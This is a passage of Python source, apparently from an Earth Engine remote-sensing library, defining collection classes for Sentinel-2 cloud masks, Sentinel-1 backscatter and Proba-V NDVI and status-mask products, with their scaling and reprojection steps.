ee.Image(geemask.StaticsMask(\n                self.stat_s2sclclassesarray, \n                None, \n                self.stat_threshold, \n                self.stat_thresholdunits, \n                eestatisticsregion, \n                verbose=verbose)\n                .makemask(eesclimgcollection))\n            eesclimgcollection = eesclimgcollection.filter(ee.Filter.date(eedatefrom, eedatetill))\n        #\n        # (optional) filtering - remark: staticsmask is calculated with complete (unfiltered) scl collection\n        #\n        if self.finalcolfilter is not None:\n            eesclimgcollection = self.finalcolfilter.filtercollection(eesclimgcollection, eeroi, verbose=verbose)\n\n        #\n        #\n        #\n        def mask(image):\n            return (self.conv_maskmaker.makemask(image, staticsmask)\n                    .toUint8()             # uint8 [0:not masked, 1:masked] (obsolete ?)\n                    .rename('MASK')\n                    .copyProperties(image, ['system:time_start', 'gee_date']))\n        \n        eeimagecollection = eesclimgcollection.map(mask)\n        #\n        # add collection properties describing this collection (in this case: overwrites 'gee_description' from GEECol_s2scl)\n        # \n        eeimagecollection = eeimagecollection.set('gee_description', 'S2sclcombimask')\n        #\n        #\n        #\n        return eeimagecollection \n\n    def scaleandflag(self, eeimagecollection, verbose=False):\n        \"\"\"\n        'S2 half tiles' (e.g. 31UES on '2020-01-29') have limited their footprint to the area \n        where data lives, thus *NOT* the full 31UES footprint\n        when exporting masks [0,1] for these images, we'll indicate the unknown area with 255 as no data\n        \n        0: not masked (clear sky)\n        1: masked (belgian sky)\n        255: no data (belgian politics)\n        \"\"\"\n        eeimagecollection = eeimagecollection.map(lambda image: (image\n            .unmask(255, False)            # no data to 255\n            .toUint8()))                   # actually obsolete here\n        return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2sclclassfractions(GEECol_s2scl):\n\n    def __init__(self, s2sclclassesarray=None):\n        \"\"\"\n        this class is only meant as an aid in evaluating the GEECol_s2sclstaticsmask parameters\n        :param s2sclclassesarray: list of s2 scl classes\n        \"\"\"\n        #\n        # super (GEECol_s2scl) WITHOUT filter\n        #\n        super().__init__(colfilter=None)\n        #\n        # s2sclclassesarray\n        #\n        if s2sclclassesarray is None: \n            #self.s2sclclassesarray = [3,8,9,10,11]   # default: in clouds we trust, ... 
and snow?\n            self.s2sclclassesarray = [3,8,9,10]\n        else:\n            if not isinstance(s2sclclassesarray, list) : raise ValueError(\"s2sclclassesarray expected to be a list\")\n            for number in s2sclclassesarray:\n                if not isinstance(number, numbers.Number) : raise ValueError(\"s2sclclassesarray expected to be a list of integers\")\n                if not (0 <= number <= 11) : raise ValueError(\"ridiculous s2 scl class value (expected [0,11])\")\n            \n            self.s2sclclassesarray = s2sclclassesarray\n\n    def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n        #\n        # daily mosaicked scl collection\n        #\n        eesclimgcollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n        #\n        #\n        #\n        fractions = ( ee.Image(geemask.ClassFractions(\n            self.s2sclclassesarray, \n            None)\n            .makefractions(eesclimgcollection)\n            .rename('FRACTIONS')\n            .copyProperties(eesclimgcollection.first(), ['system:time_start', 'gee_date'])))\n        #\n        # make (single image) collection and add properties describing this collection\n        # \n        eeimagecollection = ee.ImageCollection(fractions).set('gee_description', \"S2sclclassfractions\")\n        #\n        #\n        #\n        return eeimagecollection\n\n    def scaleandflag(self, eeimagecollection, verbose=False):\n        \"\"\"\n        we'll scale the fractions [0.0, 1.0] to percentages [0, 100]\n\n        we'll export them as Int16, \n        *NOT as Uint8*, because my current QGIS has problems showing histograms of Uint8, \n        *NOT as Int8*, because my current GEE exports these - according to QGIS- \"Data type Int16 - Sixteen bit signed integer\" anyway\n        hence, with Int16, at least we know what we are doing, we can use 255 for no-data, and we get a decent histogram\n        ...jiezes...I just should have kept floats...\n        \"\"\"\n        eeimagecollection = eeimagecollection.map(lambda image: (image\n            .multiply(100)\n            .clamp(0,100)                  # loses properties\n            .unmask(255, False)            # no data to 255\n            .toInt16()                     # .toUint8()\n            .copyProperties(image)\n            .copyProperties(image, ['system:time_start'])))\n        return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2rgb(GEECol, OrdinalProjectable):\n    \"\"\"\n    experimental - just for the fun of it (to check where multiband images give problems)\n    \n    https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_S2_SR\n    - doesn't bother to give minimum and maximum values of the bands\n    - their sample snippet hacks around with the quality bands to reduce clouds, and then ***.divide(10000)*** - this gives a hint?\n    \n    https://sentinel.esa.int/web/sentinel/user-guides/sentinel-2-msi/definitions\n    - tells something about TCI bands (True Color Image)\n      'The TCI is an RGB image built from the B02 (Blue), B03 (Green), and B04 (Red) Bands. \n      The reflectances are coded between 1 and 255, 0 being reserved for 'No Data'. \n      The saturation level of 255 digital counts correspond to a level of 3558 for L1C products \n      or 2000 for L2A products (0.3558 and 0.2 in reflectance value respectively.'\n    \n      GEE collection seems to have replaced this 'No Data' by masking it.\n\n    - Sentinel-2 Products Specification Document (issue 14.6 16/03/2021) page 425:\n      'The conversion formulae to apply to image Digital Numbers (DN) to obtain physical values is:\n      Reflectance (float) = DC / (QUANTIFICATION_VALUE)\n      Note that the reflectance meaningful values go from \"1\" to \"65535\" as \"0\" is reserved for the NO_DATA.\n\n      problem: ...DN...DC... 
???\n problem: QUANTIFICATION_VALUE not found in GEE\n \n https://gis.stackexchange.com/questions/233874/what-is-the-range-of-values-of-sentinel-2-level-2a-images\n - refers to \"Level 2A Product Format Specifications Technical Note\"\n - which is nowhere to be found (anymore?)\n - but claims that once upon a time, there might have been \n - a formulae: Surface reflectance SR = DN / 10000.\n - a comment: spectacular effects on surface or clouds could lead to values higher than 1.0\n \n \"\"\"\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n\n# eeimagecollection = (ee.ImageCollection('COPERNICUS/S2_SR')\n# .select(['B4', 'B3', 'B2'])\n# .filterBounds(eeroi)\n# .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # using the mystic TCI bands - including SCL to allow SCL based filter\n # \n eeimagecollection = (ee.ImageCollection('COPERNICUS/S2_SR')\n .select(['TCI_R', 'TCI_G', 'TCI_B', 'SCL'])\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) filtering - typically -but not mandatory- using an SCL based filter\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # drop SCL band which was only included to allow SCL based filter\n #\n eeimagecollection = eeimagecollection.select(['TCI_R', 'TCI_G', 'TCI_B'])\n #\n # apply median composite in case of overlapping images on same day\n # could be refined (e.g. select value with max ndvi) but worldcover \n # uses median too, and this is just an experimental class anyway.\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"median\", verbose=verbose)\n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S2tcirgb')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(0, False) # no data to 0 as esa intended\n .toUint8()))\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s2cloudlessmask(GEECol, CategoricalProjectable):\n \"\"\"\n experimental - just to compare to GEECol_s2sclconvmask and GEECol_s2sclcombimask\n \n copy of the gee tutorial \"Sentinel-2 Cloud Masking with s2cloudless\"\n\n https://developers.google.com/earth-engine/tutorials/community/sentinel-2-s2cloudless\n https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_S2_CLOUD_PROBABILITY#description\n \n issues:\n - s2cloudless probability has problems at edges \n - e.g. geeutils.half31UESpoint on geeutils.half31UESday\n - data beyond image data (at edge)\n - and this data does not seem correct\n - resulting (mask) image extends beyond edges too \n - hence the updateMask with SCL mask, at least it is consistent with GEECol_s2sclconvmask\n - suggested parameters need tuning. \n - e.g. 
CLD_PRJ_DIST on 1 km is too little for half31UESpoint on geeutils.half31UESday; shadows are ignored.\n \n \"\"\"\n def __init__(self, colfilter=None):\n \"\"\"\n configuration parameters:\n CLOUD_FILTER (60) integer Maximum image cloud cover percent allowed in image collection\n CLD_PRB_THRESH (50) integer Cloud probability (%); values greater than are considered cloud\n NIR_DRK_THRESH (0.15) float Near-infrared reflectance; values less than are considered potential cloud shadow\n CLD_PRJ_DIST (1) float Maximum distance (km) to search for cloud shadows from cloud edges\n BUFFER (50) integer Distance (m) to dilate the edge of cloud-identified objects\n \"\"\"\n self.CLOUD_FILTER = 100 #60\n self.CLD_PRB_THRESH = 40 #50\n self.NIR_DRK_THRESH = 0.15\n self.CLD_PRJ_DIST = 5 #1\n self.BUFFER = 100 #50\n\n \"\"\"\n (optional) filtering - only applied on 'COPERNICUS/S2_SR' \n - hence very specific; \n - goal is to get same filtering as GEECol_s2sclconvmask and GEECol_s2sclcombimask\n \"\"\"\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n \n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # Import and filter S2 SR.\n #\n s2_sr_col = (ee.ImageCollection('COPERNICUS/S2_SR')\n .filterBounds(eeroi)\n .filterDate(eedatefrom, eedatetill)\n .filter(ee.Filter.lte('CLOUDY_PIXEL_PERCENTAGE', self.CLOUD_FILTER)))\n #\n # (optional) filtering\n #\n if self.colfilter is not None:\n s2_sr_col = self.colfilter.filtercollection(s2_sr_col, eeroi, verbose=verbose)\n #\n # Import and filter s2cloudless.\n #\n s2_cloudless_col = (ee.ImageCollection('COPERNICUS/S2_CLOUD_PROBABILITY')\n .filterBounds(eeroi)\n .filterDate(eedatefrom, eedatetill))\n #\n # Join the filtered s2cloudless collection to the SR collection by the 'system:index' property.\n #\n eeimagecollection = ee.ImageCollection(ee.Join.saveFirst('s2cloudless').apply(**{\n 'primary': s2_sr_col,\n 'secondary': s2_cloudless_col,\n 'condition': ee.Filter.equals(**{\n 'leftField': 'system:index', 'rightField': 'system:index'})}))\n\n #\n # Define a function to add the s2cloudless probability layer and derived cloud mask as bands to an S2 SR image input.\n #\n def add_cloud_bands(img):\n # Get s2cloudless image, subset the probability band.\n cld_prb = ee.Image(img.get('s2cloudless')).select('probability')\n \n # Condition s2cloudless by the probability threshold value.\n is_cloud = cld_prb.gt(self.CLD_PRB_THRESH).rename('clouds')\n \n # Add the cloud probability layer and cloud mask as image bands.\n return img.addBands(ee.Image([cld_prb, is_cloud]))\n\n # \n # Define a function to add dark pixels, cloud projection, and identified shadows as bands to an S2 SR image input. 
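(A hedged toy illustration of the geometry, numbers assumed:\n        #  shadow_azimuth = 90 - MEAN_SOLAR_AZIMUTH_ANGLE, e.g. 90 - 158 = -68 degrees,\n        #  i.e. the shadow is projected away from the sun's azimuth.)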
\n    # Note that the image input needs to be the result of the above add_cloud_bands function \n    # because it relies on knowing which pixels are considered cloudy ('clouds' band).\n    # \n        def add_shadow_bands(img):\n            # Identify water pixels from the SCL band.\n            not_water = img.select('SCL').neq(6)\n        \n            # Identify dark NIR pixels that are not water (potential cloud shadow pixels).\n            SR_BAND_SCALE = 1e4\n            dark_pixels = img.select('B8').lt(self.NIR_DRK_THRESH*SR_BAND_SCALE).multiply(not_water).rename('dark_pixels')\n        \n            # Determine the direction to project cloud shadow from clouds (assumes UTM projection).\n            shadow_azimuth = ee.Number(90).subtract(ee.Number(img.get('MEAN_SOLAR_AZIMUTH_ANGLE')))\n        \n            # Project shadows from clouds for the distance specified by the CLD_PRJ_DIST input.\n            cld_proj = (img.select('clouds').directionalDistanceTransform(shadow_azimuth, self.CLD_PRJ_DIST*10)\n                .reproject(**{'crs': img.select(0).projection(), 'scale': 100})\n                .select('distance')\n                .mask()\n                .rename('cloud_transform'))\n        \n            # Identify the intersection of dark pixels with cloud shadow projection.\n            shadows = cld_proj.multiply(dark_pixels).rename('shadows')\n        \n            # Add dark pixels, cloud projection, and identified shadows as image bands.\n            return img.addBands(ee.Image([dark_pixels, cld_proj, shadows])) \n\n        #\n        # Define a function to assemble all of the cloud and cloud shadow components and produce the final mask.\n        #\n        def add_cld_shdw_mask(img):\n            # Add cloud component bands.\n            img_cloud = add_cloud_bands(img)\n        \n            # Add cloud shadow component bands.\n            img_cloud_shadow = add_shadow_bands(img_cloud)\n        \n            # Combine cloud and shadow mask, set cloud and shadow as value 1, else 0.\n            is_cld_shdw = img_cloud_shadow.select('clouds').add(img_cloud_shadow.select('shadows')).gt(0)\n        \n            # Remove small cloud-shadow patches and dilate remaining pixels by BUFFER input.\n            # 20 m scale is for speed, and assumes clouds don't require 10 m precision.\n            is_cld_shdw = (is_cld_shdw.focal_min(2).focal_max(self.BUFFER*2/20)\n                .reproject(**{'crs': img.select([0]).projection(), 'scale': 20})\n                .rename('cloudmask'))\n        \n            # Add the final cloud-shadow mask to the image.\n            return img_cloud_shadow.addBands(is_cld_shdw)\n        \n        # \n        # base collection - extend with calculated bands => now the thing has 29 bands ( print(geeutils.szbandsinfo(eeimagecollection.first())) )\n        #\n        eeimagecollection = eeimagecollection.map(add_cld_shdw_mask)\n        #\n        # but normally we want only the resulting 'cloudmask'\n        #\n        eeimagecollection = eeimagecollection.map(lambda image: (image\n            .select('cloudmask')\n            .updateMask(image.select('SCL').mask())))\n        #\n        #\n        #\n        #\n        # apply max composite in case of overlapping images on same day\n        #\n        eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"max\", verbose=verbose)\n        #\n        # add collection properties describing this collection (in this case: overwrites 'gee_description' from GEECol_s2scl)\n        # \n        eeimagecollection = eeimagecollection.set('gee_description', 'S2cloudlessmask')\n        #\n        #\n        #\n        return eeimagecollection\n\n    def scaleandflag(self, eeimagecollection, verbose=False):\n        \"\"\"\n        'S2 half tiles' (e.g. 
31UES on '2020-01-29') have limited their footprint to the area \n        where data lives, thus *NOT* the full 31UES footprint\n        when exporting masks [0,1] for these images, we'll indicate the unknown area with 255 as no data\n        \n        0: not masked (clear sky)\n        1: masked (belgian sky)\n        255: no data (belgian politics)\n        \"\"\"\n        eeimagecollection = eeimagecollection.map(lambda image: (image\n            .unmask(255, False)            # no data to 255\n            .toUint8()))                   # actually obsolete here\n        return eeimagecollection\n\n\n###############################################################################\n#\n# Sentinel 1 related products\n#\n###############################################################################\n\n\"\"\"\n\"\"\"\nclass GEECol_s1sigma0(GEECol, UserProjectable):\n    \"\"\"\n    https://developers.google.com/earth-engine/datasets/catalog/COPERNICUS_S1_GRD\n    \"\"\"\n    def __init__(self, szband, szorbitpass, szplatformnumber=None):\n        \n        if not szband in ['VV', 'VH', 'HV', 'HH']:\n            raise ValueError(\"band must be specified as one of 'VV', 'VH', 'HV', 'HH'\")\n        self.szband = szband\n\n        if not szorbitpass in ['ASC', 'ASCENDING', 'DES', 'DESCENDING']:\n            raise ValueError(\"orbitpass must be specified as one of 'ASCENDING'(or 'ASC'), 'DESCENDING'(or 'DES')\")\n        if szorbitpass == 'ASC': szorbitpass = 'ASCENDING'\n        if szorbitpass == 'DES': szorbitpass = 'DESCENDING'\n        self.szorbitpass = szorbitpass\n\n        #\n        # default = all platforms. possible to choose explicitly 'A' or 'B'\n        #\n        if szplatformnumber is not None:\n            if not szplatformnumber in ['A', 'B']:\n                raise ValueError(\"platformnumber -if specified- must be one of 'A' or 'B'\")\n        self.szplatformnumber = szplatformnumber\n\n    def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n        #\n        # base collection - limited to single band & single orbit direction\n        #\n        eeimagecollection = (ee.ImageCollection('COPERNICUS/S1_GRD')\n                             .filter(ee.Filter.eq('instrumentSwath', 'IW'))\n                             .filter(ee.Filter.listContains('system:band_names', self.szband))\n                             .filter(ee.Filter.eq('orbitProperties_pass', self.szorbitpass))\n                             .filterBounds(eeroi)\n                             .filter(ee.Filter.date(eedatefrom, eedatetill)))\n        #\n        # just the selected platform -if specified-\n        #\n        if self.szplatformnumber is not None: \n            eeimagecollection = eeimagecollection.filter(ee.Filter.eq('platform_number', self.szplatformnumber))\n        #\n        # just the selected band\n        #\n        eeimagecollection = eeimagecollection.select([self.szband])\n        #\n        # apply mosaic in case of multiple images in roi (on same day) since\n        # - I don't have a clue what it 'should' be (mean, median, ...?)\n        # - S1 images do not seem to overlap\n        # - so we only need this step for roi's at edges\n        # - worldcereal/worldcover has been using plain mosaic from start\n        # - and it doesn't need the everlasting from-to-db\n        #\n        eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"mosaic\", verbose=verbose)\n        #\n        # add collection properties describing this collection - S1, as always, being something special\n        # \n        eeimagecollection = eeimagecollection.set('gee_description', 'S1' + (\"\" if self.szplatformnumber is None else str(self.szplatformnumber)) + 'sigma0_' + self.szband + '_' + self.szorbitpass[0:3])\n        #\n        #\n        #\n        return eeimagecollection\n\n    def scaleandflag(self, eeimagecollection, verbose=False):\n        \"\"\"\n        TODO: for the moment just toFloat() conversion\n        \"\"\"\n        eeimagecollection = eeimagecollection.map(lambda image: (image\n            .toFloat()))\n        return eeimagecollection\n\n    def _reproject(self, eeimagecollection, eeprojection, verbose=False):\n        
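# A hedged worked example (values assumed) of why dB must be linearised before averaging:\n        # -10 dB -> 10**(-10/10) = 0.10; mean(0.10, 0.20) = 0.15; 10*log10(0.15) = -8.24 dB,\n        # whereas naively averaging -10 dB and -6.99 dB in dB-space would give -8.49 dB.\n        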
\"\"\"\n reproject the collection - for S1 we need to convert and reconvert from/to dB\n \"\"\"\n def undodbprojredodb(image):\n return (ee.Image(10.0).pow(image.divide(10.0))\n .reduceResolution(ee.Reducer.mean(), maxPixels=4096)\n .reproject(eeprojection)\n .log10().multiply(10.0)\n .rename(image.bandNames()) # gotcha: eeimagecollection 2 bands: no problem, 1 band: name becomes 'constant': \"The output bands are named for the longer of the two inputs, or if they're equal in length, in image1's order.\"\n .copyProperties(image)\n .copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(undodbprojredodb)\n\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s1gamma0(GEECol_s1sigma0):\n\n def __init__(self, szband, szorbitpass, szplatformnumber=None):\n super().__init__(szband, szorbitpass, szplatformnumber=szplatformnumber)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # can't use GEECol_s1sigma0.collect to convert sigma to gamma:\n # problem is that we do need the 'angle' - will be dropped later\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S1_GRD')\n .filter(ee.Filter.eq('instrumentSwath', 'IW'))\n .filter(ee.Filter.listContains('system:band_names', self.szband))\n .filter(ee.Filter.listContains('system:band_names','angle'))\n .filter(ee.Filter.eq('orbitProperties_pass', self.szorbitpass))\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # just the selected platform -if specified-\n #\n if self.szplatformnumber is not None: \n eeimagecollection = eeimagecollection.filter(ee.Filter.eq('platform_number', self.szplatformnumber))\n #\n # gamma = f(sigma)\n #\n def sigme0dbtogamma0db(image):\n \"\"\"\n gamma0 = sigma0 / cos(t) with t in radians = angle(degrees) x pi / 180\n => 10 x log(gamma0) = 10 x log(sigma0) - 10 x log(cos(t))\\\n => gamma0_db = sigma0_db - 10 x log(cos(t))\n \"\"\"\n return (image.select(self.szband)\n .subtract(image.select('angle').multiply(3.1415/180.0).cos().log10().multiply(10.))\n .copyProperties(image)\n .copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(sigme0dbtogamma0db)\n #\n # apply plain mosaic in case of multiple images in roi (on same day)\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"mosaic\", verbose=verbose)\n #\n # add collection properties describing this collection - S1, as always, being something special\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S1' + (\"\" if self.szplatformnumber is None else str(self.szplatformnumber)) + 'gamma0_' + self.szband + '_' + self.szorbitpass[0:3])\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n TODO: for the moment just toFloat() conversion\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .toFloat()))\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_s1rvi(GEECol, OrdinalProjectable):\n \"\"\"\n experimental - just for the fun of it (to play with S1_GRD_FLOAT collection)\n \"\"\"\n\n def __init__(self, szorbitpass, szplatformnumber=None):\n \n if not szorbitpass in ['ASC', 'ASCENDING', 'DES', 'DESCENDING']:\n raise ValueError(\"orbitpass must be specified as one of 'ASCENDING'(or 'ASC'), 'DESCENDING'(or 'DES')\")\n if szorbitpass == 'ASC': szorbitpass = 'ASCENDING'\n if szorbitpass == 'DES': szorbitpass = 'DESCENDING'\n self.szorbitpass = szorbitpass\n #\n # default = all platforms. 
possible to choose explicitly 'A' or 'B'\n #\n if szplatformnumber is not None:\n if not szplatformnumber in ['A', 'B']:\n raise ValueError(\"platformnumber -if specified- must be one of 'A' or 'B'\")\n self.szplatformnumber = szplatformnumber\n \n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # base collection - using S1_GRD_FLOAT collection\n #\n eeimagecollection = (ee.ImageCollection('COPERNICUS/S1_GRD_FLOAT')\n .filter(ee.Filter.eq('instrumentSwath', 'IW'))\n .filter(ee.Filter.listContains('system:band_names', 'VV'))\n .filter(ee.Filter.listContains('system:band_names', 'VH'))\n .filter(ee.Filter.eq('orbitProperties_pass', self.szorbitpass))\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # just the selected platform -if specified-\n #\n if self.szplatformnumber is not None: \n eeimagecollection = eeimagecollection.filter(ee.Filter.eq('platform_number', self.szplatformnumber))\n #\n # apply rvi = 4 x VH / (VV + VH)\n #\n def rvi(image):\n vv = image.select('VV')\n vh = image.select('VH')\n rvi = vh.multiply(4).divide(vh.add(vv))\n return ee.Image(rvi.rename('RVI').copyProperties(image, ['system:id', 'system:time_start']))\n eeimagecollection = eeimagecollection.map(rvi)\n #\n # apply maximum composite in case of overlapping images on same day. TODO: is this ok?\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=\"max\", verbose=verbose) \n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'S1' + (\"\" if self.szplatformnumber is None else str(self.szplatformnumber)) + 'rvi_' + self.szorbitpass[0:3])\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n TODO: for the moment just toFloat() conversion\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .toFloat()))\n return eeimagecollection\n\n\n###############################################################################\n#\n# Proba V related products\n#\n###############################################################################\n\n\"\"\"\n\"\"\"\nclass PV333smfilter(geemask.IColFilter):\n \"\"\"\n simple filter for ProbaV 333m collections, based on STATUS MASK band.\n default settings filter: minimum 5% pixels have STATUS MASK values 112, 120, 240 or 248\n 0111 0000 : 112 Radiometric all but blue ok. sea. clear sky.\n 0111 1000 : 120 Radiometric all but blue ok. land. clear sky.\n 1111 0000 : 240 Radiometric all ok. sea. clear sky. \n 1111 1000 : 248 Radiometric all ok. land. clear sky. 
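\n\n    a hedged worked check of the bit layout (interpretation assumed), e.g. for 248:\n        >>> 0b11111000\n        248\n        >>> 248 & 0b111    # bits 0-2 == 0 -> clear sky\n        0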
\n\n    typical use in the collect method of ProbaV 333m products (GEECol daughter classes)\n    \"\"\"\n    def __init__(self, classesarray=[112, 120, 240, 248], thresholdpct=5):\n        \"\"\"\n        :param classesarray: list (python list, NOT ee.List) of the STATUS MASK values to be evaluated\n        :param thresholdpct: the minimum (positive thresholds) or maximum (negative thresholds) percentage coverage by these values ( [0..100] )\n        \"\"\"\n        self.filter = geemask.SimpleFilter('SM', classesarray, thresholdpct)\n\n    def filtercollection(self, eeimagecollection, eeregion, verbose=False):\n        \"\"\"\n        :param eeimagecollection: ProbaV 333m ee.ImageCollection to be filtered (MUST CONTAIN SM BAND)\n        :param eeregion: region to be evaluated by the filter (would be nice if the eeimagecollection actually covers this region...)\n        \"\"\"\n        if verbose: print(f\"{str(type(self).__name__)}.filtercollection: input collection: {geeutils.szimagecollectioninfo(eeimagecollection)}\")\n        eeimagecollection = self.filter.filtercollection(eeimagecollection, eeregion, verbose=verbose)\n        if verbose: print(f\"{str(type(self).__name__)}.filtercollection: resulting collection: {geeutils.szimagecollectioninfo(eeimagecollection)}\")\n        return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_pv333ndvi(GEECol, OrdinalProjectable):\n    \"\"\"\n    https://developers.google.com/earth-engine/datasets/catalog/VITO_PROBAV_C1_S1_TOC_333M\n    \"\"\"\n\n    def __init__(self, colfilter=None):\n        self.colfilter=colfilter\n        if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n    def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n        #\n        # base collection\n        #\n        eeimagecollection = (ee.ImageCollection('VITO/PROBAV/C1/S1_TOC_333M')\n                             .select(['NIR', 'RED', 'SM'])   # SM to allow STATUS MASK-based filters\n                             .filterBounds(eeroi)\n                             .filter(ee.Filter.date(eedatefrom, eedatetill)))\n        #\n        # (optional) filtering\n        #\n        if self.colfilter is not None:\n            eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n        #\n        # apply ndvi = (nir-red)/(nir+red)\n        #\n        def ndvi(image):\n            return ((image.select('NIR').subtract(image.select('RED'))).divide(image.select('NIR').add(image.select('RED')))\n                    .rename('NDVI')\n                    .copyProperties(image, ['system:id', 'system:time_start']))\n        eeimagecollection = eeimagecollection.map(ndvi)\n        #\n        # no sense in mosaicing: S1_TOC_333M is global\n        # however: geeutils.mosaictodate adds the 'gee_date' property which is mandatory in a GEECol\n        # TODO: check if nop-mosaic costs performance. 
if so add 'gee_date' without mosaicing\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=None, verbose=verbose) # currently None defaults to \"mosaic\" \n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'PV333ndvi')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .clamp(-1,1) # clamp looses properties \n .toFloat() # should be obsolete here, but side effect is no-data as -inf or nan iso 0\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection\n\n\n\"\"\"\nGEECol_pv333ndvi with historical vito ndvi scaling\n\"\"\"\nclass GEECol_pv333ndvi_he(GEECol_pv333ndvi):\n\n def __init__(self, colfilter=None):\n super().__init__(colfilter)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n return super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose).set('gee_description', 'PV333ndvi_he')\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n #\n # historical vito ndvi scaling [ -0.08, 0.92 ] -> [0, 250] with 255 as no-data\n #\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .add(0.08).multiply(250).clamp(0,250)\n .unmask(255, False)\n .toUint8()\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection \n\n\n\"\"\"\n\"\"\"\nclass GEECol_pv333sm(GEECol, CategoricalProjectable):\n \"\"\"\n https://developers.google.com/earth-engine/datasets/catalog/VITO_PROBAV_C1_S1_TOC_333M#bands\n \n Bits 0-2: Cloud/ice snow/shadow flag : 0: Clear 1: Shadow 2: Undefined 3: Cloud4: Ice\n Bit 3: Land/sea : 0: Sea 1: Land (pixels with this value may include areas of sea)\n Bit 4: Radiometric quality SWIR flag : 0: Bad 1: Good\n Bit 5: Radiometric quality NIR flag : 0: Bad 1: Good\n Bit 6: Radiometric quality RED flag : 0: Bad 1: Good\n Bit 7: Radiometric quality BLUE flag : 0: Bad 1: Good\n \n remark: this is a BIT coded mask. \n we do use CategoricalProjectable (mode),\n but one might argue reprojecting should be done per-bit \n \n \"\"\"\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n #\n # base collection\n #\n eeimagecollection = (ee.ImageCollection('VITO/PROBAV/C1/S1_TOC_333M')\n .select(['SM'])\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) filtering\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # no sense in mosaicing: S1_TOC_333M is global\n # however: geeutils.mosaictodate adds the 'gee_date' property which is mandatory in a GEECol\n # TODO: check if nop-mosaic costs performance. 
